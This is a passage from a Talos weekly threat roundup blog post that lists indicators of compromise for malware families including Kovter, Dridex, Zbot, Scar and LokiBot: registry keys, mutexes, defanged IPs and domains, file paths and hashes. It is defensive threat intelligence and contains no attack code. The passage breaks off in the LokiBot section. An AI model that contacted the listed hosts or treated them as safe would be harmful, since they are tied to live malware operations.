Friday, June 11, 2021

Threat Roundup for June 4 to June 11


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 4 and June 11. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.Kovter-9868480-1 Dropper Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Dropper.CoinMiner-9868311-1 Dropper This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html.
Win.Trojan.Dridex-9870190-0 Trojan Dridex is a well-known banking trojan that steals credentials and other sensitive information from an infected machine.
Win.Trojan.Scar-9868327-0 Trojan Scar will download and execute files to the system while spreading to other machines by copying itself to removable media.
Win.Packed.Zbot-9868422-0 Packed Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like key-logging and form-grabbing.
Win.Dropper.LokiBot-9868454-0 Dropper Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Trojan.Zegost-9869702-0 Trojan Zegost is a remote access trojan designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. Zegost appears to be derived from Gh0stRAT, which is a well-known remote access trojan that had its source code leaked, thus significantly lowering the barrier to entry for actors looking to modify and reuse the code in new attacks.
Win.Packed.Redline-9869818-1 Packed Redline Stealer is an information-stealer written in .NET and sold on hacking forums.
Win.Downloader.Barys-9868878-0 Downloader This is a trojan and downloader that allows malicious actors to upload files to a victim's computer.

Threat Breakdown

Win.Dropper.Kovter-9868480-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 23
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 23
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE 23
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
20
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
20
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0521341d
20
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0521341d
20
<HKCU>\SOFTWARE\FC6A75BE78 20
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 20
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: bca7705c
20
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: bca7705c
20
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0905afc0
14
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0905afc0
14
<HKLM>\SOFTWARE\WOW6432NODE\92RXSFSFJC
Value Name: GzX9tmD
1
<HKLM>\SOFTWARE\WOW6432NODE\92RXSFSFJC
Value Name: 1Dwq8QmT1
1
<HKLM>\SOFTWARE\WOW6432NODE\633CEF3DB6BD7CED 1
<HKLM>\SOFTWARE\WOW6432NODE\DHOJZ0MOJ 1
<HKLM>\SOFTWARE\WOW6432NODE\633CEF3DB6BD7CED
Value Name: 52024FC3E38AF76E7B1
1
<HKLM>\SOFTWARE\WOW6432NODE\DHOJZ0MOJ
Value Name: 1BKtl3
1
<HKLM>\SOFTWARE\WOW6432NODE\DHOJZ0MOJ
Value Name: cEx8loD
1
<HKLM>\SOFTWARE\WOW6432NODE\77AF4C0D4B8135D8 1
<HKLM>\SOFTWARE\WOW6432NODE\AJ53QCT 1
<HKLM>\SOFTWARE\WOW6432NODE\77AF4C0D4B8135D8
Value Name: D858C9F7ABF0693F6
1
<HKLM>\SOFTWARE\WOW6432NODE\AJ53QCT
Value Name: D52zp4VIGZ
1
<HKLM>\SOFTWARE\WOW6432NODE\AJ53QCT
Value Name: sSDSVGnR
1
Mutexes Occurrences
B8ED4D143840045A 21
6DD7DBFFCEB24BFD 21
Global\CD5FF936B43684FB 21
C59C87A31F74FB56 20
Global\42EDC1955FE17AD4 20
0D0D9BEBF5D08E7A 20
1315B41013857E19 20
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
37[.]67[.]195[.]64 1
180[.]229[.]48[.]57 1
149[.]158[.]16[.]243 1
11[.]162[.]16[.]81 1
58[.]156[.]153[.]65 1
111[.]178[.]244[.]233 1
59[.]40[.]216[.]214 1
121[.]128[.]115[.]29 1
3[.]153[.]146[.]93 1
4[.]17[.]110[.]85 1
123[.]255[.]189[.]254 1
83[.]32[.]64[.]56 1
161[.]119[.]80[.]188 1
200[.]238[.]65[.]114 1
47[.]234[.]29[.]105 1
219[.]232[.]90[.]24 1
145[.]226[.]37[.]115 1
36[.]105[.]72[.]159 1
185[.]9[.]69[.]42 1
114[.]195[.]112[.]164 1
142[.]120[.]143[.]200 1
183[.]66[.]62[.]68 1
98[.]188[.]48[.]198 1
166[.]192[.]135[.]148 1
201[.]153[.]57[.]233 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]copertini[.]pt 1
www[.]edisesuniversita[.]it 1
parking[.]beepdomains[.]co[.]uk 1

File Hashes

026145bd04c704ab1e7a14de91e5f51ae848043da8e0664c149fe6227ced218f 07a84405df127604500f4ef348ba993e4f748f03da4515004c9cc04f0f2823e3 07e9ca089f73a06f0e42bf432cf5d66dca37018ddd100e7c3f0a4f68d077266e 0e05196c0bde5461f04896c7ff50ed373f3baea64928dd45d1b59f7a35cce7da 0e32a91580be5cc3c1fbf3809f01a0698eb70a3fc93d7caac851eb95ceac8487 17319ae9ed8934dc151338df03ee126abd5506d44060c4a3bed566c8e722b671 174b50e575981390ae94ffd7030102ff91c1fd2b5156c74b198b7c53d4043bdc 1a4e8719cc06064a5c3a68ba2ec603e1eaabc26dfddadb18012f10428fa65f17 1a66517b63941ead8e10a0a47cc1f054a618aa50c3a3fa14f4005bb4d552df08 22705100fa0a646b9be7f408f9005808e0b1246ec937d72c6a482f04952a9628 22ce4a4549f920b187247f7af32c58591d427901ac246ca6808132a4a7a97883 23b326c327d593d4eee77cdbd536faa0848f71f9f9f0609a8a09a90ef57d221f 2a7b96c9044b6db03bb561c74d31ef6e4df88a7fc9c5dac872a12607647fa3f7 2ad707f710ce4aeb5064bcbf9276f1e2bf57498393d00c3ee1f912d3844ac249 3141cafc0fe2e0d162ebd1994576f9ebd93f8a1d56692a60a02cd5ea76d72356 34cb5e49712199dfdf0d406325c988d24aa704c70a62dcf477822c25e7eca158 3b0a7f47fc50c69234db43a57d7c17053a4569787d019288ea35c6a5a3f503ec 3b505a1c0e8209d49d85a8424436947439f7715bc0fcf9bd5fe405f2bf6f1f1a 402639997b05fe9dcb922449f2294122de7ea0869f2382503cac7e5f89cd21bc 4aa0e45796488c99257b717784ca3b91b1840ecb0eff013b20f94312110a2381 4f5ff4b818675d8cec6c9e781d2f8f743d89f93327130a0fedba35a7803221bf 52945e4b18f6cedee9fddbfa8ccae39e61af5d7623fb9fbf224fba5649845728 5a21fac01ce8d68e133cbf19dcce885c9ecbd9421238ca6ad71bc0099becc53d 628df94830ea41723f88e61e9c8bf6021f473f7a23523dbe43ce30c06f421804 6314f434b2a014438e3276ef0f6c4c2a0b4156f530919087654a2e1ccff65c09
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.CoinMiner-9868311-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
60[.]12[.]67[.]85 11
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
xcn1[.]yiluzhuanqian[.]com 11
Files and or directories created Occurrences
\TEMP\protect.exe 11
\protect.exe 11

File Hashes

0f7714acf50dc83665d6d45670eff9b52e0169a2e30110eae2ea111fad6b1202 3ddb084ab131f9b9f1b183710c9c264acd06331f8133725464436519b17de49b 45610fc7368c677c84587845440f6978e1e66dd7d2cfbdae273ebae0d8c72681 68cd2f22008d259834cab6f06a9bacebd3c7b2f6ddde825fbce1d6d0b0216a4d 6cf67f5b2cbd4d6286c495d101a1d1c07dd5d426a8d290c29f5468fd192164ac 72ca729c22dcd4581ec5e3a72dfa5621b9a7a11de5fd43e0ac2c4dbcee745a7e b1a5fac6583594efe1c7517cf3843b5830c8ec80216d1199202b6cb615cfc79a c5160fa6455b24166ee8acd3b2bc00f5e1c3c9ed93c93ea090e0670fa9b445c9 e6167e54e088f35d74d30e9ca9aa70df3a6d3c54465d8c5d1d74795dcd0ea4d2 f7c1cef707c948bba2ce18ad181e5d2593aec16ce7b214fedc003e324b7c9623 fdea8b569aaf2cfebe6c17a92baee161b6132980b00dcbc6df8f05077c3d2f22

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Trojan.Dridex-9870190-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963} 18
Mutexes Occurrences
{ac5b642b-c225-7367-a847-11bdf3a5e67c} 18
{24d07012-9955-711c-e323-1079ebcbe1f4} 18
{a2c9c140-d256-a4d5-6465-f62a6660f79e} 18
{a8af557b-6de9-c774-28f4-5c293f1b1769} 18
{b570fe85-587a-a133-ffc9-73821a57c0c1} 18
{<random GUID>} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
104[.]26[.]13[.]31 1
104[.]18[.]8[.]171 1
104[.]21[.]59[.]252 1
172[.]67[.]158[.]82 1
104[.]21[.]80[.]171 1
104[.]21[.]25[.]222 1
172[.]67[.]194[.]17 1
172[.]67[.]177[.]22 1
172[.]67[.]222[.]38 1
104[.]21[.]76[.]97 1
172[.]67[.]155[.]144 1
Files and or directories created Occurrences
%System32%\Tasks\Ryddmbivo 18
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\WBpwM6IDv 1
%APPDATA%\Adobe\mxW 1
%APPDATA%\Adobe\Acrobat\hLkhSN9g8uN 1
%APPDATA%\Microsoft\InfoPath\1iFcU 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\A53bx7oKq 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\ycSEvo1wA 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\FC2O6Fels 1
%APPDATA%\Adobe\ly1 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\W31CuSTJO 1
%APPDATA%\Microsoft\InfoPath\9JEMt 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Iswbc18VN 1
%APPDATA%\Microsoft\InfoPath\MEBjU 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Amf2eZ5b5 1
%APPDATA%\Adobe\Acrobat\aDDcUz 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\ivF6pubCG 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\1k5tlHyVZ 1
%APPDATA%\Microsoft\InfoPath\CKdRc 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\6KLDSL7qR 1

File Hashes

13ba745a3c6b9be27b1623eb571246b4ec88721971948760dc2e1dea7848cc02 2b431d75cb40fe9b800f34418764463f77cac945817264e67b029df0559641cf 2b66dee5bf44c888fde337d13f618661845adb40e31b6189536252f5dd735add 3f74fd91ce6be5c06b3fbf5f492245babd1ba386cba6f6f4e82c42c0d7eb7382 624b24518843d792ed39303175fd8709c284bd8514a19d05ffa45180a5506b0b 6b8f65239c94cca77349acb9c55639293a31c7abb41ef8d73242e8cd78d78654 86a8edc6fb996dc34443bab23837e293e485edc6782e1edca5a3b1af6b0399a5 8a2dcce59e037bdfb765c092607e89ecd2563c1ca10d40eba876b13e0f544a85 9145b460c460859249386410392f94a36ff0ef5ebde7c4214f19dcf685a63e63 91b1cf196293d5d12e57dc07b8c60ecd787726b7114b3a40cc7da204b5328a08 a513c3e62ef5fafc329e051728dc1e08c16a75f692c74b34b31810ffcf06af4b ac1d9d9644957f3f148e4ed6a173f8033312337a5dbd541551ee26e04962002c b1708f9ced2e0c6b66bce2ebefa809969c1277e71b87ba772439fc9929252d83 b1e27ff4424c1d74a81c818898f07443e229ff56bd48dca1947f0268784887e3 b6c288398515fddb07ce2045432de0f0e5fd449a1859685056565ce7494386a2 c15cf658b7473d35a23f4838841f080e8673984fc486d4e20892e2ccd4ad0146 c6cbb2284c42cba73ea57d274b752ca74080f5b10d8997ddea7df25145ff4746 cc35ac0abe6e51b2bd7cd40805b9c17cd26bbb08f641aeeba9154edd7455a658

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Trojan.Scar-9868327-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Mutexes Occurrences
wow64 21
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
88[.]198[.]147[.]80 21
91[.]214[.]124[.]161 21
173[.]199[.]2[.]13 1
52[.]85[.]151[.]4 1
99[.]84[.]189[.]123 1
99[.]84[.]189[.]23 1
52[.]85[.]151[.]59 1
173[.]199[.]2[.]14/31 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
walletwasabi[.]io 21
Files and or directories created Occurrences
%SystemRoot%\Tasks\wow64.job 23
%System32%\Tasks\wow64 21
%SystemRoot%\Tasks\hrknddrrhvhhhguulbk.job 1
%SystemRoot%\Tasks\gihevarpiuovorkibng.job 1
%SystemRoot%\Tasks\lqqrrsttuvwwxabbcdd.job 1
%SystemRoot%\Tasks\vlqopdoghjkvxkvnoqr.job 1
%SystemRoot%\Tasks\pwvolemfhbsgevewark.job 1
%SystemRoot%\Tasks\qbmacelnkntwegspmov.job 1
%SystemRoot%\Tasks\vqtshbjiquerbtdckow.job 1
%SystemRoot%\Tasks\erdfvxacnobneghjuwj.job 1
%SystemRoot%\TEMP\gghhh.exe 1
%SystemRoot%\Tasks\whiijjkllmmnnooppqq.job 1
%System32%\Tasks\erdfvxacnobneghjuwj 1
%System32%\Tasks\whiijjkllmmnnooppqq 1
%SystemRoot%\TEMP\foihq.exe 1
%SystemRoot%\Tasks\aivfxscuxdlfoigaoiq.job 1
%SystemRoot%\TEMP\kuheg.exe 1
%SystemRoot%\Tasks\gbgnbmnavnfqitvieum.job 1
%System32%\Tasks\aivfxscuxdlfoigaoiq 1
%System32%\Tasks\gbgnbmnavnfqitvieum 1
%SystemRoot%\TEMP\bitapu.exe 1
%SystemRoot%\Tasks\uoldccbgfjxewwvcbgt.job 1
%SystemRoot%\TEMP\ibkuqie.exe 1
%SystemRoot%\Tasks\dshucfdgjvfwuwujqjq.job 1
%System32%\Tasks\uoldccbgfjxewwvcbgt 1
*See JSON for more IOCs

File Hashes

0de3e11f175808c17e473bc12213413853c718d6dcb11a2ca5710f143eed5ec8 20b5e0c00a50f514047ae19df5058ce3d8802a635e710f0d7cc7394faa2109ac 24327e0c3c90b42e97e86beec792f72131c7d57488728cd1cd96e7d36a17bf09 26a351eedcc2597880558caae3c502808d854f0d9c8fc263168b941927988fd1 37e2bb6a3010b997a3210811cc09eea13d5fbc927d28da60c98ce0fc820ce98f 380de4261374d646161ed28b7363af5431110f2974f04b22f95795daf583363a 509aeffe10ee5ef168782bd240adc2f4e19fc0067a8a2e7a7667a82ed11ca90c 57c40500eb80c9e4715261df8eb06d322943d93424a6c785db68d3208092577e 7f9bf7e5dd287d63cd295f27c9ef83f5545ce28b7e2859d2a2573d4340915693 94fba396beffc62745de248d711f6d26bb6c8a7bbe0274a0035034997e561b32 967172f2991b28400466f63a3179cbf12435a072b51704bc4b2de19f5b4e3a95 97eb8efcba3f1ea4de5ae8b92ffca9fcef30149d34ab46bee3273b2b0c27d1c3 9f2951d56edd918490349c68e9728a5cd6861c8816276141da807d0b4411ae28 a7fb6b83e5212b86d3c6c898f0426fb568b3c170558108dd0eff8e0d7bb33e31 a9bc5265b517e74e9f40ee3032a0e0d8bcaf9dfa2c47b3988bf7245d73a6ab34 b14554f8e230b0eaff1a0a6c6c3b4032041cb1410a16d4b71b87edbe7de1f427 d7536a536700237fbe1ce5612390c565055a59187866b7dcfedca6e5128da2d7 dc8e581065ecdd414e76d069f0d355e565f4cb6d0f4991ba51176042a9c445a1 dfbe911d1380be0f7a078287ec87b0dad5dbefadd312bfb61905745396b168c2 e9862e9d7ab96e635ad5a00f335dab84b4f243572ea268685c083ed74cfae78d ebbb412e53011de88fd5f69283ae1370eb1b89e86833e34bd1a4b60409ea098e f3e82a5b81e904b06ad0a2eb487520d1cbdc322708795d3e6a640c6601c7b315 fa54058a1ff9a1b549a264457440486c55ef120537c4b62cc213e5e80afd23d5

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Zbot-9868422-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 29 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {BE9CF6FF-9ACE-F848-60AC-C353D9C7DAA6}
7
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'> 7
<HKCU>\SOFTWARE\MICROSOFT\POOTAQ
Value Name: Evotxeu
1
<HKCU>\SOFTWARE\MICROSOFT\OHRO
Value Name: Efiphokaa
1
<HKCU>\SOFTWARE\MICROSOFT\NEBYU
Value Name: Coaqarra
1
<HKCU>\SOFTWARE\MICROSOFT\YSXI
Value Name: Radyq
1
<HKCU>\SOFTWARE\MICROSOFT\WYBU
Value Name: Udimert
1
<HKCU>\SOFTWARE\MICROSOFT\FIUS
Value Name: Tuofs
1
<HKCU>\SOFTWARE\MICROSOFT\PEYTAG
Value Name: Goaka
1
Mutexes Occurrences
Local\{58888AD4-E6E5-1E5C-60AC-C353D9C7DAA6} 7
Local\{58888AD7-E6E6-1E5C-60AC-C353D9C7DAA6} 7
Local\{732EEFE6-83D7-35FA-60AC-C353D9C7DAA6} 7
Global\{5356DFE1-B3D0-1582-60AC-C353D9C7DAA6} 7
GLOBAL\{<random GUID>} 7
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
23[.]96[.]30[.]229 1
172[.]67[.]131[.]148 1
172[.]67[.]161[.]225 1
Files and or directories created Occurrences
%TEMP%\tmp<random, matching '[0-9a-z]{8}'>.bat 7
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 7
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe 7
%APPDATA%\Doox\gaqy.ufa 1
%APPDATA%\Zuunqu\uqux.isi 1
%APPDATA%\Xouzti\raper.itb 1
%APPDATA%\Hoyb\okfi.zaq 1
%APPDATA%\Gyrau\iqmio.tuk 1
%APPDATA%\Hymine\emwus.dix 1
%APPDATA%\Yxeboh\toze.ywi 1

File Hashes

0b28eac5fc4ce79ff6d29a7f20c8f1d136d2404e057e485fdda1400ce8ee66dc 0d8004881d60771f000761bcf94b47a524400730dd124762f179fb376770ff77 10595336c7714fe8ebc7186005a2d0aa2792dce7a4f9e68b0310922379b66e06 12f2742d4fbdb8b91506fc4817af3c796cce4f54d341566eb6a3153d8deb98de 17d38920a3290869cef9012751d5ab91cb2ee31f81a1e0c7b8a9c453ccf57a93 285c14d9f91fee5b07f733edb18047a6444b106770668bf244e1c29b03a1e925 2aa964bd443db7efa350b657865492f96177a7abd125c548b8f845a0212f54cf 2cd4a3dcfd09feee82048a5c85d360d5a91ad17e3a92d620c0332c48c56f1ded 30a7acaab2703e79b256c976ff9457705a89f87b8b476ca64d8b1c0d57897eaa 3252abd9995ecfebc77e81041fe9d4001155b36dfb0c2919e0ff64c8a8176f7e 53e7bb23c8c72ad9416e8da2658ff934e227f0a658c9034b29efca654d7a88c1 56c0bfabb9f4bd1d360895e4930b5640da0a11d8b565d6b7ea2e585bffd6cffe 66bafa793f55f0b1b5ca1a525963b5a8e1fa4850ce6fa1933759b053acd3fb49 6e83e7d0032129dc8ffe7bd6a6cf59cdccd6d3005d8599f3d24369f2785a16cb 70ed59bc594c9add55d2d47008b6e0e44c0b498250451f2a21eab6b4136f3ece 805a4710b0f0a9231f6f050ac70ffb68162e8d91bdb2ef548bdca319a130b9a2 8b2164d113621f0a64e16d55cffa0062af819c1c62b6696dde0854cd73603c82 9cf1b143b1df8fd45e0be1beda0e319bd5aba70f84586536daf84dfeaee09976 9e8ec167d7e82fc5b0e59a6dfc72d053d7692b96bf9a82c7f34b222aa6cf7e8d a509075658270ee3eaa5ea83b961162ebe61809ec6f56dbc9736e37d6c21b8d3 a50ff572417223783f577da682ead1ad64b705d06a44b95dc4ba9f042a6bdf91 ad3077a6d629376bf88db1089ea20655d8c52390d96d4c17cca5c290ac433dfa b74065d1a89bfd69909d2cf4d064ade3ceb022d160b619f36ef65fbded2a583b bbd4b511470fa36c54d0cfc3356b0223ce573834a1f81484b3d9093ca81af65e c5612cc6d4005d8ef721363f8377d590588d40be5daeefcaadbe45b3d15eeade
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.LokiBot-9868454-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME 10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: DisplayName
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: UninstallString
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: DisplayIcon
10
